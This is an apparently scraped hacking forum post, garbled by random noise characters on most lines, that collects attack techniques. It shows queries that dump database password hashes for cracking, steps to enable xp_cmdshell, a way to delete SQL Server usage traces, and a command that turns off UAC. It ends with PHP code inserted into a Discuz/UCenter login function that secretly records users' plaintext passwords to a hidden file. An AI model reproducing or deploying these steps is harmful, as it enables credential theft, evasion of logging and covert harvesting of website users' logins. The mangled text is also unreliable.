' Z# r! h" `8 {/ J7 x; F& }0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
9 @& @7 h3 q; i( N: _2FD54D6119FFF04129A1D72E7C3194F7284A7F3A0 {) c0 I/ N3 k1 }# x& G2 |
9 Z( A, O S8 M7 W0×0100- constant header
+ o: n, G7 W3 a34767D5C- salt5 W. w _1 ~/ z
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash/ s% q9 B& ?2 ^# _* y" ^$ l
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash, k3 m. S$ J; I2 m1 U
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash, e" p7 v( X) ? u5 b! k
SQL server 2005:-
7 Q6 F# f a/ h q, t7 PSELECT password_hash FROM sys.sql_logins where name='sa'' A1 u, y% c) `* ]: `% H
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F3 K* |3 o. U( O) H% Q1 ~ T+ y$ y1 V
0×0100- constant header
$ L" r( B) ]- [! D8 [993BF231-salt
9 u8 z2 B4 h& ?6 ~8 _4 n7 k5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
5 i* k, V, x+ n- ocrack case sensitive hash in cain, try brute force and dictionary based attacks.
3 I5 g7 e) k5 a% M, ]. j. \& I
: d! K( _* }- m; \7 iupdate:- following bernardo’s comments:-* j+ ~1 q2 Q' P$ |( u
use function fn_varbintohexstr() to cast password in a hex string.2 E# V8 D, w4 \. S" O' t
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
1 f& u# ?7 ~8 i3 m0 p; T: j" g$ z+ m9 z1 ~
MYSQL:-$ T. d4 a. t! Q$ V! ?$ L
" R0 d% O; z9 q% c h& gIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
/ r5 N' _0 `; @1 V) i( I+ G# K% v9 z$ H8 ~+ m5 e
*mysql < 4.1% w& u# c# D+ R1 F' S
1 [) X& x7 p8 S/ ~' [
mysql> SELECT PASSWORD(‘mypass’);9 \7 s: R6 ?9 V6 _
+——————–+* Z. C9 l$ `" L1 M, w& a7 V @. k. p& Q
| PASSWORD(‘mypass’) |! e" b$ z3 e5 {0 N o$ C
+——————–+
# q; q5 w1 z7 l* k. v6 e| 6f8c114b58f2ce9e |! l, x/ }$ E' g/ @; U& G: w1 l
+——————–+, y ]! m+ |% ?6 @
" r- g2 t( ]! x* p*mysql >=4.1
5 Q" E7 V2 E( f5 _: i- W) w/ M+ q8 y* E9 a: O. q
mysql> SELECT PASSWORD(‘mypass’);
' S( z6 ]9 l7 k; i. n9 A+——————————————-+
( R0 y+ w. d; m+ s. e7 A| PASSWORD(‘mypass’) |
, f( o2 O0 j! B) H$ a- R4 @+——————————————-+
N% n- f0 G+ ]! y; c% E8 [| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |0 Z5 J( C+ j# p
+——————————————-+8 [1 @3 f! W; m9 |+ _
$ L1 P, L9 y! z+ w8 ZSelect user, password from mysql.user0 o. X) y4 I# i0 @4 e
The hashes can be cracked in ‘cain and abel’
" T! L1 Y& v; i4 ?0 h6 y" m V& h6 z3 `" l" f/ `
Postgres:-8 F+ k, T5 E# g% Y) l
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) ?3 J, E1 @" c4 \' ?$ C0 |
select usename, passwd from pg_shadow; w& U" W! b+ ~2 L7 J( Y; ]' P* W
usename | passwd
0 a3 @5 G$ o7 V* _——————+————————————-7 w/ {& h; F/ _
testuser | md5fabb6d7172aadfda4753bf0507ed4396
+ l( z" V9 D% ]/ i+ ^use mdcrack to crack these hashes:-$ }+ x4 f2 z; f/ D; m1 @
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
' {7 f$ `! D) \- F" `! P6 p2 {( N! H X$ Q$ w; n0 r
Oracle:-0 q* w/ f8 a1 Y3 u4 Y, s
select name, password, spare4 from sys.user$" E7 M3 O0 D$ y
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g4 `5 S! ?0 n0 T4 L* A3 g
More on Oracle later, i am a bit bored….: F& m' n% Z: \/ S% Z' E6 n9 {: T
5 N7 W0 d# K3 a |6 e
& _* h- R2 |& r7 X* k在sql server2005/2008中开启xp_cmdshell
6 q6 p+ H+ A9 ?. m n5 ^5 s: w-- To allow advanced options to be changed.& m- j4 S, N! }$ n) D, [
EXEC sp_configure 'show advanced options', 1
; z3 k$ S5 t4 ~7 T. L0 t' {- }GO
u; ]0 @2 n; {; {) ~+ H5 e-- To update the currently configured value for advanced options.. p6 t+ q" L) w5 ]: {
RECONFIGURE3 S6 x9 q g( h4 U# u7 v3 @8 _, N
GO
; j# t+ w, ^* D! A I% t+ \; N S-- To enable the feature.
6 k8 v: U5 {" }3 W) G h* o: LEXEC sp_configure 'xp_cmdshell', 1
1 o* ?# T5 m9 S+ M9 F! p: C. [GO
2 Y2 a2 H: e+ q8 B s-- To update the currently configured value for this feature.
) r( Y: w* i( U/ |# o* Q/ HRECONFIGURE; u( \ o1 o }- h3 V
GO# l6 g. V+ E1 f6 |
SQL 2008 server日志清除,在清楚前一定要备份。
. m7 l" Y6 O+ T# Y. D- _: ^如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
5 k6 \- W4 X' I1 h9 C( JX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin# x5 P& V8 V; Z; R6 ]1 O
: G& y: W1 w( w' _7 M! V对于SQL Server 2008以前的版本:+ a" P7 f+ i* Z7 ^7 k( p8 W
SQL Server 2005:5 S* `2 A0 D$ W" z( t+ d
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
& Y& q q$ a& l7 mSQL Server 2000:' n6 j) `& K8 o* c
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
( m5 C6 @0 P0 y* h9 n: I
7 f1 j0 M9 O8 R% ?; o6 r/ I$ Q( V: f本帖最后由 simeon 于 2013-1-3 09:51 编辑$ P4 i1 j9 ~# p# Q
' b3 U' w0 A# B d
% k6 t' ?9 W% S9 a& R/ O3 G8 Cwindows 2008 文件权限修改5 G% Q2 Q/ t: m; I
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
% e6 u$ o4 Y% O1 M i! E0 U2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad984 E$ d+ Q% z$ P; o
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
$ C# U8 V& q; Z0 o8 I# D; Z/ s. j/ |% R9 U7 K
Windows Registry Editor Version 5.00$ W: ]/ g6 B( {, @
[HKEY_CLASSES_ROOT\*\shell\runas]
0 E7 g$ `4 t7 l' k8 T7 [" C@="管理员取得所有权"
" L6 C7 k' S# Q w8 x" M"NoWorkingDirectory"=""
1 `# ^2 @$ w3 @- q) N) N- ][HKEY_CLASSES_ROOT\*\shell\runas\command]0 A5 s* t" k2 Y" b3 [: N+ d1 O
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 M( t) l4 N5 }3 x0 n"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 N+ E% H, B% @) q# Q[HKEY_CLASSES_ROOT\exefile\shell\runas2]
. l( q# ]3 D0 s+ M6 R' q% D@="管理员取得所有权"
( T3 ]! `$ W. E5 E5 }0 [# a"NoWorkingDirectory"=""
0 l# t) `% t# n- ]# ?[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
; Q& S# W4 @ n2 _3 t/ d/ I# a@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
b; P) J h E! a% R" D"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, @+ l4 v: U& L- D# _( Y
. T/ K2 r0 `0 R! ^0 r[HKEY_CLASSES_ROOT\Directory\shell\runas]
% ]- _; P& A: i@="管理员取得所有权"
) }. i+ }, ]# X8 A"NoWorkingDirectory"="") r3 E: j8 r l& Z8 n7 n
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]+ ?) f; x, T4 u- ~
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
- k* @( {- g3 K8 ~, y9 u5 S" k- L"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"5 b0 W1 K7 ]# B3 _
% u4 d- l9 g2 e
) L) H8 E8 Z$ F3 j, m: Jwin7右键“管理员取得所有权”.reg导入
& Q. l! Z. { h二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
6 W2 i& i% U0 p1、C:\Windows这个路径的“notepad.exe”不需要替换
3 G- ]7 e3 |: D( K$ H+ ~/ \) k( j2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
1 w# X, C; x9 G3 t+ O" a( E' d3、四个“notepad.exe.mui”不要管 n+ Q& Z# t) n( Z
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和. z2 r# G8 G8 ^( h
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
) t9 a+ Y5 k7 @% L替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,# O2 G A: D' v7 F: b% L1 {
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
" z# }1 j! r- T# T5 L* cwindows 2008中关闭安全策略:
2 E$ l: _5 N' U3 C9 Y4 @4 Qreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f- ~9 Z, d, v$ U- g0 j9 F$ s+ d
修改uc_client目录下的client.php 在
8 b4 p" O9 T( l& P' E |function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {- C4 F# [: r0 O
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php) z% }5 H3 q1 N4 a
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw* x/ E: s9 v3 v; k, k9 d
if(getenv('HTTP_CLIENT_IP')) {
6 @# S) ^- w' w; y% e$onlineip = getenv('HTTP_CLIENT_IP');
$ ?( Y$ U& a+ y5 D' N* y} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
8 O7 ]9 e) n& M7 ?/ e$onlineip = getenv('HTTP_X_FORWARDED_FOR');7 C# z: J7 r) x; ?8 }- v. N
} elseif(getenv('REMOTE_ADDR')) {
+ ?% W9 e6 L3 V6 h$onlineip = getenv('REMOTE_ADDR');- k" M4 p; w! ^. X' |
} else {
0 v, r c( I: ?1 {! x$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];4 v! e* g. H3 F
}
! ~' H# ~+ _4 s2 z- s+ ^ $showtime=date("Y-m-d H:i:s");
+ Z; {! u' u. Z# a- e4 u, L $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
0 r* l2 T& `0 _8 H; G1 u $handle=fopen('./data/cache/csslog.php','a+');/ Z& L4 Q8 W: r6 ^1 o$ O0 t
$write=fwrite($handle,$record); |